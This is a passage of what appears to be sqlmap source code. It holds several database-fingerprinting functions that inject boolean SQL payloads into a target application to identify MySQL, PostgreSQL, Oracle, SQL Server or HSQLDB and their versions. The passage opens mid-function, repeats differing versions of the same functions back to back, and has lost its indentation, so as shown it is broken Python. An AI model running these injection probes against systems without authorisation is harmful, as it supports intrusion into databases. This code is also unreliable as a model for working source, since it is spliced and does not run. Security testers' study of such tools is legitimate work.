elif inject.checkBooleanExpression(
"@@table_open_cache=@@table_open_cache"):
if inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)"
):
Backend.setVersionList([">= 5.1.12", "< 5.5.0"])
elif inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)"
):
Backend.setVersionList([">= 5.1.7", "< 5.1.12"])
elif inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)"
):
Backend.setVersion("= 5.1.6")
elif inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)"
):
Backend.setVersionList([">= 5.1.5", "< 5.1.6"])
else:
Backend.setVersionList([">= 5.1.2", "< 5.1.5"])
# Check if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.checkBooleanExpression("@@hostname=@@hostname"):
Backend.setVersionList([">= 5.0.38", "< 5.1.2"])
elif inject.checkBooleanExpression(
"@@character_set_filesystem=@@character_set_filesystem"
):
Backend.setVersionList([">= 5.0.19", "< 5.0.38"])
elif not inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])"
):
Backend.setVersionList([">= 5.0.11", "< 5.0.19"])
elif inject.checkBooleanExpression(
"@@div_precision_increment=@@div_precision_increment"):
Backend.setVersionList([">= 5.0.6", "< 5.0.11"])
elif inject.checkBooleanExpression(
"@@automatic_sp_privileges=@@automatic_sp_privileges"):
Backend.setVersionList([">= 5.0.3", "< 5.0.6"])
else:
Backend.setVersionList([">= 5.0.0", "< 5.0.3"])
elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"):
Backend.setVersion(">= 5.0.2")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
elif inject.checkBooleanExpression(
"STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"):
Backend.setVersion("< 5.0.0")
setDbms("%s 4" % DBMS.MYSQL)
self.getBanner()
if not conf.extensiveFp:
return True
# Check which version of MySQL < 5.0.0 it is
if inject.checkBooleanExpression(
"3=(SELECT COERCIBILITY(USER()))"):
Backend.setVersionList([">= 4.1.11", "< 5.0.0"])
elif inject.checkBooleanExpression(
"2=(SELECT COERCIBILITY(USER()))"):
Backend.setVersionList([">= 4.1.1", "< 4.1.11"])
elif inject.checkBooleanExpression(
"CURRENT_USER()=CURRENT_USER()"):
Backend.setVersionList([">= 4.0.6", "< 4.1.1"])
if inject.checkBooleanExpression(
"'utf8'=(SELECT CHARSET(CURRENT_USER()))"):
Backend.setVersion("= 4.1.0")
else:
Backend.setVersionList([">= 4.0.6", "< 4.1.0"])
else:
Backend.setVersionList([">= 4.0.0", "< 4.0.6"])
else:
Backend.setVersion("< 4.0.0")
setDbms("%s 3" % DBMS.MYSQL)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3)
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES)
or conf.dbms in PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg)
randInt = getUnicode(randomInt(1))
result = inject.checkBooleanExpression(
"%s::int=%s" % (randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"COALESCE(%s, NULL)=%s" % (randInt, randInt))
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
setDbms(DBMS.PGSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersion(">= 9.1.0")
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1, 'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"):
Backend.setVersionList([">= 8.4.0", "< 9.0.0"])
elif inject.checkBooleanExpression(
"EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
Backend.setVersionList([">= 8.3.0", "< 8.4.0"])
elif inject.checkBooleanExpression(
"ISFINITE(TRANSACTION_TIMESTAMP())"):
Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"):
Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
elif inject.checkBooleanExpression(
"3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"):
Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
elif inject.checkBooleanExpression(
"'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"):
Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
elif inject.checkBooleanExpression(
"'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"):
Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
elif inject.checkBooleanExpression(
"'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"):
Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"):
Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
elif inject.checkBooleanExpression("VERSION()=VERSION()"):
Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
elif inject.checkBooleanExpression(
"2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"):
Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
elif inject.checkBooleanExpression(
"'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"):
Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
else:
Backend.setVersion("< 6.2.0")
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in ORACLE_ALIASES:
setDbms(DBMS.ORACLE)
self.getBanner()
if not conf.extensiveFp:
return True
logMsg = "testing Oracle"
logger.info(logMsg)
# NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting
# directly to the Oracle database
if conf.direct:
result = True
else:
payload = agent.fullPayload("AND ROWNUM=ROWNUM")
result = Request.queryPage(payload)
if result:
logMsg = "confirming Oracle"
logger.info(logMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
else:
payload = agent.fullPayload("AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DBMS is not Oracle"
logger.warn(warnMsg)
return False
setDbms(DBMS.ORACLE)
self.getBanner()
if not conf.extensiveFp:
return True
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
version = inject.getValue(query, unpack=False, suppressOutput=True)
if re.search("^11", version):
kb.dbmsVersion = ["11i"]
elif re.search("^10", version):
kb.dbmsVersion = ["10g"]
elif re.search("^9", version):
kb.dbmsVersion = ["9i"]
elif re.search("^8", version):
kb.dbmsVersion = ["8i"]
return True
else:
warnMsg = "the back-end DBMS is not Oracle"
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
self.getBanner()
if not conf.extensiveFp:
kb.os = "Windows"
return True
infoMsg = "testing Microsoft SQL Server"
logger.info(infoMsg)
payload = agent.fullPayload(" AND LEN(@@VERSION)=LEN(@@VERSION)")
result = Request.queryPage(payload)
if result:
infoMsg = "confirming Microsoft SQL Server"
logger.info(infoMsg)
for version in (0, 5, 8):
randInt = randomInt()
query = " AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
if result:
if version == 8:
kb.dbmsVersion = ["2008"]
break
elif version == 5:
kb.dbmsVersion = ["2005"]
break
elif version == 0:
kb.dbmsVersion = ["2000"]
break
else:
query = " AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
if result:
kb.dbmsVersion = ["7.0"]
break
if kb.dbmsVersion:
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
else:
setDbms("Microsoft SQL Server")
self.getBanner()
kb.os = "Windows"
return True
else:
warnMsg = "the back-end DMBS is not Microsoft SQL Server"
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
DATABASE_VERSION()
version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d')
version 2.2.5 added SYSTIMESTAMP function
version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions
version 2.2.0 added support for ROWNUM() function
version 2.1.0 added MEDIAN aggregate function
version < 2.0.1 added support for datetime ROUND and TRUNC functions
version 2.0.0 added VALUES support
version 1.8.0.4 Added org.hsqldbdb.Library function, getDatabaseFullProductVersion to return the
full version string, including the 4th digit (e.g 1.8.0.4).
version 1.7.2 CASE statements added and INFORMATION_SCHEMA
"""
if not conf.extensiveFp and Backend.isDbmsWithin(HSQLDB_ALIASES):
setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion()))
if Backend.isVersionGreaterOrEqualThan("1.7.2"):
kb.data.has_information_schema = True
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.HSQLDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("CASEWHEN(1=1,1,0)=1")
if result:
infoMsg = "confirming %s" % DBMS.HSQLDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB
logger.warn(warnMsg)
return False
else:
kb.data.has_information_schema = True
Backend.setVersion(">= 1.7.2")
setDbms("%s 1.7.2" % DBMS.HSQLDB)
banner = self.getBanner()
if banner:
Backend.setVersion("= %s" % banner)
else:
if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"):
Backend.setVersionList([">= 2.0.0", "< 2.3.0"])
else:
banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True))
if banner:
Backend.setVersion("= %s" % banner)
else:
Backend.setVersionList([">= 1.7.2", "< 1.8.0"])
return True
else:
warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89)
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42)
* http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4)
* http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0)
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
"""
if conf.dbms in MYSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("MySQL %s" % kb.dbmsVersion[0])
if int(kb.dbmsVersion[0]) >= 5:
kb.data.has_information_schema = True
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "testing MySQL"
logger.info(infoMsg)
randInt = str(randomInt(1))
payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
result = Request.queryPage(payload)
if result:
infoMsg = "confirming MySQL"
logger.info(infoMsg)
payload = agent.fullPayload(" AND ISNULL(1/0)")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DMBS is not MySQL"
logger.warn(warnMsg)
return False
# Determine if it is MySQL >= 5.0.0
if inject.getValue("SELECT %s FROM information_schema.TABLES LIMIT 0, 1" % randInt, charsetType=2) == randInt:
kb.data.has_information_schema = True
kb.dbmsVersion = [">= 5.0.0"]
setDbms("MySQL 5")
self.getBanner()
if not conf.extensiveFp:
return True
# Check if it is MySQL >= 5.5.0
if inject.getValue("SELECT MID(TO_SECONDS(950501), 1, 1)", unpack=False, charsetType=2) == "6":
kb.dbmsVersion = [">= 5.5.0"]
# Check if it is MySQL >= 5.1.2 and < 5.5.0
elif inject.getValue("MID(@@table_open_cache, 1, 1)", unpack=False):
if inject.getValue("SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1" % randInt, unpack=False, charsetType=2) == randInt:
kb.dbmsVersion = [">= 5.1.12", "< 5.5.0"]
elif inject.getValue("SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1" % randInt, unpack=False, charsetType=2) == randInt:
kb.dbmsVersion = [">= 5.1.7", "< 5.1.12"]
elif inject.getValue("SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1" % randInt, unpack=False, charsetType=2) == randInt:
kb.dbmsVersion = ["= 5.1.6"]
elif inject.getValue("SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1" % randInt, unpack=False, charsetType=2) == randInt:
kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"]
else:
kb.dbmsVersion = [">= 5.1.2", "< 5.1.5"]
# Check if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.getValue("MID(@@hostname, 1, 1)", unpack=False):
kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"]
elif inject.getValue("SELECT 1 FROM DUAL", charsetType=1) == "1":
kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"]
elif inject.getValue("DATABASE() LIKE SCHEMA()"):
kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"]
else:
kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"]
# Otherwise assume it is MySQL < 5.0.0
else:
kb.dbmsVersion = ["< 5.0.0"]
setDbms("MySQL 4")
self.getBanner()
if not conf.extensiveFp:
return True
# Check which version of MySQL < 5.0.0 it is
coercibility = inject.getValue("COERCIBILITY(USER())")
if coercibility == "3":
kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"]
elif coercibility == "2":
kb.dbmsVersion = [">= 4.1.1", "< 4.1.11"]
elif inject.getValue("CURRENT_USER()"):
kb.dbmsVersion = [">= 4.0.6", "< 4.1.1"]
if inject.getValue("CHARSET(CURRENT_USER())") == "utf8":
kb.dbmsVersion = ["= 4.1.0"]
else:
kb.dbmsVersion = [">= 4.0.6", "< 4.1.0"]
elif inject.getValue("FOUND_ROWS()", charsetType=1) == "0":
kb.dbmsVersion = [">= 4.0.0", "< 4.0.6"]
elif inject.getValue("CONNECTION_ID()"):
kb.dbmsVersion = [">= 3.23.14", "< 4.0.0"]
elif re.search("@[\w\.\-\_]+", inject.getValue("USER()")):
kb.dbmsVersion = [">= 3.22.11", "< 3.23.14"]
else:
kb.dbmsVersion = ["< 3.22.11"]
return True
else:
warnMsg = "the back-end DMBS is not MySQL"
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* https://www.postgresql.org/docs/current/static/release.html
"""
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("QUOTE_IDENT(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
setDbms(DBMS.PGSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
if inject.checkBooleanExpression("SHA256(NULL) IS NULL"):
Backend.setVersion(">= 11.0")
elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
Backend.setVersionList([">= 10.0", "< 11.0"])
elif inject.checkBooleanExpression("SIND(0)=0"):
Backend.setVersionList([">= 9.6.0", "< 10.0"])
elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):
Backend.setVersionList([">= 8.4.0", "< 9.0.0"])
elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
Backend.setVersionList([">= 8.3.0", "< 8.4.0"])
elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"):
Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"):
Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"):
Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"):
Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"):
Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"):
Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
elif inject.checkBooleanExpression("VERSION()=VERSION()"):
Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"):
Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"):
Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
else:
Backend.setVersion("< 6.2.0")
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89)
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42)
* http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4)
* http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0)
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion()))
if Backend.isVersionGreaterOrEqualThan("5"):
kb.data.has_information_schema = True
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MYSQL
logger.info(infoMsg)
randInt = getUnicode(randomInt(1))
result = inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()")
if result:
infoMsg = "confirming %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("USER()=USER()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL
logger.warn(warnMsg)
return False
# reading information_schema on some platforms is causing annoying timeout exits
# Reference: http://bugs.mysql.com/bug.php?id=15855
# Determine if it is MySQL >= 5.0.0
if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,%s,%s))" % (randInt, randInt)):
kb.data.has_information_schema = True
Backend.setVersion(">= 5.0.0")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.MYSQL
logger.info(infoMsg)
# Check if it is MySQL >= 5.5.0
if inject.checkBooleanExpression("TO_SECONDS(950501)>0"):
Backend.setVersion(">= 5.5.0")
# Check if it is MySQL >= 5.1.2 and < 5.5.0
elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"):
if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)):
Backend.setVersionList([">= 5.1.12", "< 5.5.0"])
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt)):
Backend.setVersionList([">= 5.1.7", "< 5.1.12"])
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)):
Backend.setVersion("= 5.1.6")
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)):
Backend.setVersionList([">= 5.1.5", "< 5.1.6"])
else:
Backend.setVersionList([">= 5.1.2", "< 5.1.5"])
# Check if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.checkBooleanExpression("@@hostname=@@hostname"):
Backend.setVersionList([">= 5.0.38", "< 5.1.2"])
elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"):
Backend.setVersionList([">= 5.0.19", "< 5.0.38"])
elif not inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL WHERE %s!=%s)" % (randInt, randInt, randInt, randInt)):
Backend.setVersionList([">= 5.0.11", "< 5.0.19"])
elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"):
Backend.setVersionList([">= 5.0.6", "< 5.0.11"])
elif inject.checkBooleanExpression("@@automatic_sp_privileges=@@automatic_sp_privileges"):
Backend.setVersionList([">= 5.0.3", "< 5.0.6"])
else:
Backend.setVersionList([">= 5.0.0", "< 5.0.3"])
# For cases when information_schema is missing
elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"):
Backend.setVersion(">= 5.0.2")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
elif inject.checkBooleanExpression("STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"):
Backend.setVersion("< 5.0.0")
setDbms("%s 4" % DBMS.MYSQL)
self.getBanner()
if not conf.extensiveFp:
return True
# Check which version of MySQL < 5.0.0 it is
if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"):
Backend.setVersionList([">= 4.1.11", "< 5.0.0"])
elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"):
Backend.setVersionList([">= 4.1.1", "< 4.1.11"])
elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"):
Backend.setVersionList([">= 4.0.6", "< 4.1.1"])
if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"):
Backend.setVersion("= 4.1.0")
else:
Backend.setVersionList([">= 4.0.6", "< 4.1.0"])
else:
Backend.setVersionList([">= 4.0.0", "< 4.0.6"])
else:
Backend.setVersion("< 4.0.0")
setDbms("%s 3" % DBMS.MYSQL)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL
logger.warn(warnMsg)
return False
